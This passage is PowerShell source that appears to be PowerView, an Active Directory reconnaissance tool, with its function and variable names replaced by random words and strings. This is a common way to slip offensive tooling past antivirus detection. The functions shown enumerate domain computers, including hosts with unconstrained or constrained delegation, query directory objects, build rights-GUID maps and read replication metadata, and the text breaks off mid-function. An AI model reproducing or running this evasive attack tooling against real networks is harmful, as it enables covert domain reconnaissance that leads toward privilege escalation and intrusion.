$ySjxeOag99 | |
} | |
} | |
default { | |
Write-Warning "No handler exists for event ID: $($Event.Id)" | |
} | |
} | |
} | |
} | |
} | |
} | |
function Carmine { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([Hashtable])] | |
[CmdletBinding()] | |
Param ( | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'} | |
$SYovJgYA99 = @{} | |
if ($PSBoundParameters['Credential']) { $SYovJgYA99['Credential'] = $KWcDeQDF99 } | |
try { | |
$qWpjeGiZ99 = (truthers @ForestArguments).schema.name | |
} | |
catch { | |
throw '[Carmine] Error in retrieving forest schema path from truthers' | |
} | |
if (-not $qWpjeGiZ99) { | |
throw '[Carmine] Error in retrieving forest schema path from truthers' | |
} | |
$ufgcNRNN99 = @{ | |
'SearchBase' = $qWpjeGiZ99 | |
'LDAPFilter' = '(schemaIDGUID=*)' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$QlmtWiCn99 = Richelieu @SearcherArguments | |
if ($QlmtWiCn99) { | |
try { | |
$hCEVDJUr99 = $QlmtWiCn99.FindAll() | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0] | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[Carmine] Error disposing of the Results object: $_" | |
} | |
} | |
$QlmtWiCn99.dispose() | |
} | |
catch { | |
Write-Verbose "[Carmine] Error in building GUID map: $_" | |
} | |
} | |
$ufgcNRNN99['SearchBase'] = $qWpjeGiZ99.replace('Schema','Extended-Rights') | |
$ufgcNRNN99['LDAPFilter'] = '(objectClass=controlAccessRight)' | |
$weVbtMAA99 = Richelieu @SearcherArguments | |
if ($weVbtMAA99) { | |
try { | |
$hCEVDJUr99 = $weVbtMAA99.FindAll() | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0] | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[Carmine] Error disposing of the Results object: $_" | |
} | |
} | |
$weVbtMAA99.dispose() | |
} | |
catch { | |
Write-Verbose "[Carmine] Error in building GUID map: $_" | |
} | |
} | |
$GUIDs | |
} | |
function deputes { | |
[OutputType('PowerView.Computer')] | |
[OutputType('PowerView.Computer.Raw')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('SamAccountName', 'Name', 'DNSHostName')] | |
[String[]] | |
$mxWgOMSt99, | |
[Switch] | |
$CLwptSbP99, | |
[Switch] | |
$YhhNbDPz99, | |
[Switch] | |
$FmDGVZQi99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePrincipalName')] | |
[String] | |
$SPN, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$IRUHhYmI99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hKzwkfzE99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ZbNKanPP99, | |
[Switch] | |
$Ping, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
DynamicParam { | |
$BFveINmL99 = [Enum]::GetNames($OamCSbsR99) | |
$BFveINmL99 = $BFveINmL99 | ForEach-Object {$_; "NOT_$_"} | |
imperturbability -Name UACFilter -sADNIewc99 $BFveINmL99 -Type ([array]) | |
} | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$XPcKJDZh99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { | |
imperturbability -aRhKtQBk99 -kHkbQGKb99 $PSBoundParameters | |
} | |
if ($XPcKJDZh99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^S-1-') { | |
$btfCLlYC99 += "(objectsid=$KzBFOtcK99)" | |
} | |
elseif ($KzBFOtcK99 -match '^CN=') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[deputes] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$XPcKJDZh99 = Richelieu @SearcherArguments | |
if (-not $XPcKJDZh99) { | |
Write-Warning "[deputes] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99.Contains('.')) { | |
$btfCLlYC99 += "(|(name=$KzBFOtcK99)(dnshostname=$KzBFOtcK99))" | |
} | |
elseif ($KzBFOtcK99 -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { | |
$jjIYltxr99 = (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
else { | |
$btfCLlYC99 += "(name=$KzBFOtcK99)" | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['Unconstrained']) { | |
Write-Verbose '[deputes] Searching for computers with for unconstrained delegation' | |
$IUDzHsEr99 += '(userAccountControl:1.2.840.113556.1.4.803:=524288)' | |
} | |
if ($PSBoundParameters['TrustedToAuth']) { | |
Write-Verbose '[deputes] Searching for computers that are trusted to authenticate for other principals' | |
$IUDzHsEr99 += '(msds-allowedtodelegateto=*)' | |
} | |
if ($PSBoundParameters['Printers']) { | |
Write-Verbose '[deputes] Searching for printers' | |
$IUDzHsEr99 += '(objectCategory=printQueue)' | |
} | |
if ($PSBoundParameters['SPN']) { | |
Write-Verbose "[deputes] Searching for computers with SPN: $SPN" | |
$IUDzHsEr99 += "(servicePrincipalName=$SPN)" | |
} | |
if ($PSBoundParameters['OperatingSystem']) { | |
Write-Verbose "[deputes] Searching for computers with operating system: $IRUHhYmI99" | |
$IUDzHsEr99 += "(operatingsystem=$IRUHhYmI99)" | |
} | |
if ($PSBoundParameters['ServicePack']) { | |
Write-Verbose "[deputes] Searching for computers with service pack: $hKzwkfzE99" | |
$IUDzHsEr99 += "(operatingsystemservicepack=$hKzwkfzE99)" | |
} | |
if ($PSBoundParameters['SiteName']) { | |
Write-Verbose "[deputes] Searching for computers with site name: $ZbNKanPP99" | |
$IUDzHsEr99 += "(serverreferencebl=$ZbNKanPP99)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[deputes] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$gxZgUNPx99 | Where-Object {$_} | ForEach-Object { | |
if ($_ -match 'NOT_.*') { | |
$esPyPtCz99 = $_.Substring(4) | |
$nszuvJHF99 = [Int]($OamCSbsR99::$esPyPtCz99) | |
$IUDzHsEr99 += "(!(userAccountControl:1.2.840.113556.1.4.803:=$nszuvJHF99))" | |
} | |
else { | |
$nszuvJHF99 = [Int]($OamCSbsR99::$_) | |
$IUDzHsEr99 += "(userAccountControl:1.2.840.113556.1.4.803:=$nszuvJHF99)" | |
} | |
} | |
$XPcKJDZh99.filter = "(&(samAccountType=805306369)$IUDzHsEr99)" | |
Write-Verbose "[deputes] deputes filter string: $($XPcKJDZh99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $XPcKJDZh99.FindOne() } | |
else { $hCEVDJUr99 = $XPcKJDZh99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$Up = $True | |
if ($PSBoundParameters['Ping']) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $_.properties.dnshostname | |
} | |
if ($Up) { | |
if ($PSBoundParameters['Raw']) { | |
$GrySniik99 = $_ | |
$GrySniik99.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw') | |
} | |
else { | |
$GrySniik99 = epicure -nmZxBYze99 $_.Properties | |
$GrySniik99.PSObject.TypeNames.Insert(0, 'PowerView.Computer') | |
} | |
$GrySniik99 | |
} | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[deputes] Error disposing of the Results object: $_" | |
} | |
} | |
$XPcKJDZh99.dispose() | |
} | |
} | |
} | |
function sniffling { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.ADObject')] | |
[OutputType('PowerView.ADObject.Raw')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
DynamicParam { | |
$BFveINmL99 = [Enum]::GetNames($OamCSbsR99) | |
$BFveINmL99 = $BFveINmL99 | ForEach-Object {$_; "NOT_$_"} | |
imperturbability -Name UACFilter -sADNIewc99 $BFveINmL99 -Type ([array]) | |
} | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$GamhrjKQ99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { | |
imperturbability -aRhKtQBk99 -kHkbQGKb99 $PSBoundParameters | |
} | |
if ($GamhrjKQ99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^S-1-') { | |
$btfCLlYC99 += "(objectsid=$KzBFOtcK99)" | |
} | |
elseif ($KzBFOtcK99 -match '^(CN|OU|DC)=') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[sniffling] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$GamhrjKQ99 = Richelieu @SearcherArguments | |
if (-not $GamhrjKQ99) { | |
Write-Warning "[sniffling] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99 -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { | |
$jjIYltxr99 = (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
elseif ($KzBFOtcK99.Contains('\')) { | |
$iDLAGYJo99 = $KzBFOtcK99.Replace('\28', '(').Replace('\29', ')') | plagiarist -sVUXjDxI99 Canonical | |
if ($iDLAGYJo99) { | |
$LUdlxJMD99 = $iDLAGYJo99.SubString(0, $iDLAGYJo99.IndexOf('/')) | |
$LqFIdcne99 = $KzBFOtcK99.Split('\')[1] | |
$btfCLlYC99 += "(samAccountName=$LqFIdcne99)" | |
$ufgcNRNN99['Domain'] = $LUdlxJMD99 | |
Write-Verbose "[sniffling] Extracted domain '$LUdlxJMD99' from '$KzBFOtcK99'" | |
$GamhrjKQ99 = Richelieu @SearcherArguments | |
} | |
} | |
elseif ($KzBFOtcK99.Contains('.')) { | |
$btfCLlYC99 += "(|(samAccountName=$KzBFOtcK99)(name=$KzBFOtcK99)(dnshostname=$KzBFOtcK99))" | |
} | |
else { | |
$btfCLlYC99 += "(|(samAccountName=$KzBFOtcK99)(name=$KzBFOtcK99)(displayname=$KzBFOtcK99))" | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[sniffling] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$gxZgUNPx99 | Where-Object {$_} | ForEach-Object { | |
if ($_ -match 'NOT_.*') { | |
$esPyPtCz99 = $_.Substring(4) | |
$nszuvJHF99 = [Int]($OamCSbsR99::$esPyPtCz99) | |
$IUDzHsEr99 += "(!(userAccountControl:1.2.840.113556.1.4.803:=$nszuvJHF99))" | |
} | |
else { | |
$nszuvJHF99 = [Int]($OamCSbsR99::$_) | |
$IUDzHsEr99 += "(userAccountControl:1.2.840.113556.1.4.803:=$nszuvJHF99)" | |
} | |
} | |
if ($IUDzHsEr99 -and $IUDzHsEr99 -ne '') { | |
$GamhrjKQ99.filter = "(&$IUDzHsEr99)" | |
} | |
Write-Verbose "[sniffling] sniffling filter string: $($GamhrjKQ99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $GamhrjKQ99.FindOne() } | |
else { $hCEVDJUr99 = $GamhrjKQ99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$Object = $_ | |
$Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw') | |
} | |
else { | |
$Object = epicure -nmZxBYze99 $_.Properties | |
$Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject') | |
} | |
$Object | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[sniffling] Error disposing of the Results object: $_" | |
} | |
} | |
$GamhrjKQ99.dispose() | |
} | |
} | |
} | |
function contumelies { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.ADObjectAttributeHistory')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'Properties' = 'msds-replattributemetadata','distinguishedname' | |
'Raw' = $True | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['FindOne']) { $ufgcNRNN99['FindOne'] = $YIVtKGKK99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Properties']) { | |
$tnRLihky99 = $PSBoundParameters['Properties'] -Join '|' | |
} | |
else { | |
$tnRLihky99 = '' | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Identity']) { $ufgcNRNN99['Identity'] = $mxWgOMSt99 } | |
sniffling @SearcherArguments | ForEach-Object { | |
$dFqddswb99 = $_.Properties['distinguishedname'][0] | |
ForEach($GLlmZdDA99 in $_.Properties['msds-replattributemetadata']) { | |
$njXTfqiR99 = [xml]$GLlmZdDA99 | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue | |
if ($njXTfqiR99) { | |
if ($njXTfqiR99.pszAttributeName -Match $tnRLihky99) { | |
$ySjxeOag99 = New-Object PSObject | |
$ySjxeOag99 | Add-Member NoteProperty 'ObjectDN' $dFqddswb99 | |
$ySjxeOag99 | Add-Member NoteProperty 'AttributeName' $njXTfqiR99.pszAttributeName | |
$ySjxeOag99 | Add-Member NoteProperty 'LastOriginatingChange' $njXTfqiR99.ftimeLastOriginatingChange | |
$ySjxeOag99 | Add-Member NoteProperty 'Version' $njXTfqiR99.dwVersion | |
$ySjxeOag99 | Add-Member NoteProperty 'LastOriginatingDsaDN' $njXTfqiR99.pszLastOriginatingDsaDN | |
$ySjxeOag99.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectAttributeHistory') | |
$ySjxeOag99 | |
} | |
} | |
else { | |
Write-Verbose "[contumelies] Error retrieving 'msds-replattributemetadata' for '$dFqddswb99'" | |
} | |
} | |
} | |
} | |
} | |
function Sigismund { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.ADObjectLinkedAttributeHistory')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'Properties' = 'msds-replvaluemetadata','distinguishedname' | |
'Raw' = $True | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Properties']) { | |
$tnRLihky99 = $PSBoundParameters['Properties'] -Join '|' | |
} | |
else { | |
$tnRLihky99 = '' | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Identity']) { $ufgcNRNN99['Identity'] = $mxWgOMSt99 } | |
sniffling @SearcherArguments | ForEach-Object { | |
$dFqddswb99 = $_.Properties['distinguishedname'][0] | |
ForEach($GLlmZdDA99 in $_.Properties['msds-replvaluemetadata']) { | |
$njXTfqiR99 = [xml]$GLlmZdDA99 | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue | |
if ($njXTfqiR99) { | |
if ($njXTfqiR99.pszAttributeName -Match $tnRLihky99) { | |
$ySjxeOag99 = New-Object PSObject | |
$ySjxeOag99 | Add-Member NoteProperty 'ObjectDN' $dFqddswb99 | |
$ySjxeOag99 | Add-Member NoteProperty 'AttributeName' $njXTfqiR99.pszAttributeName | |
$ySjxeOag99 | Add-Member NoteProperty 'AttributeValue' $njXTfqiR99.pszObjectDn | |
$ySjxeOag99 | Add-Member NoteProperty 'TimeCreated' $njXTfqiR99.ftimeCreated | |
$ySjxeOag99 | Add-Member NoteProperty 'TimeDeleted' $njXTfqiR99.ftimeDeleted | |
$ySjxeOag99 | Add-Member NoteProperty 'LastOriginatingChange' $njXTfqiR99.ftimeLastOriginatingChange | |
$ySjxeOag99 | Add-Member NoteProperty 'Version' $njXTfqiR99.dwVersion | |
$ySjxeOag99 | Add-Member NoteProperty 'LastOriginatingDsaDN' $njXTfqiR99.pszLastOriginatingDsaDN | |
$ySjxeOag99.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory') | |
$ySjxeOag99 | |
} | |
} | |
else { | |
Write-Verbose "[Sigismund] Error retrieving 'msds-replvaluemetadata' for '$dFqddswb99'" | |
} | |
} | |
} | |
} | |
} | |
function sleepiest { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Replace')] | |
[Hashtable] | |
$Set, | |
[ValidateNotNullOrEmpty()] | |
[Hashtable] | |
$XOR, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$Clear, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
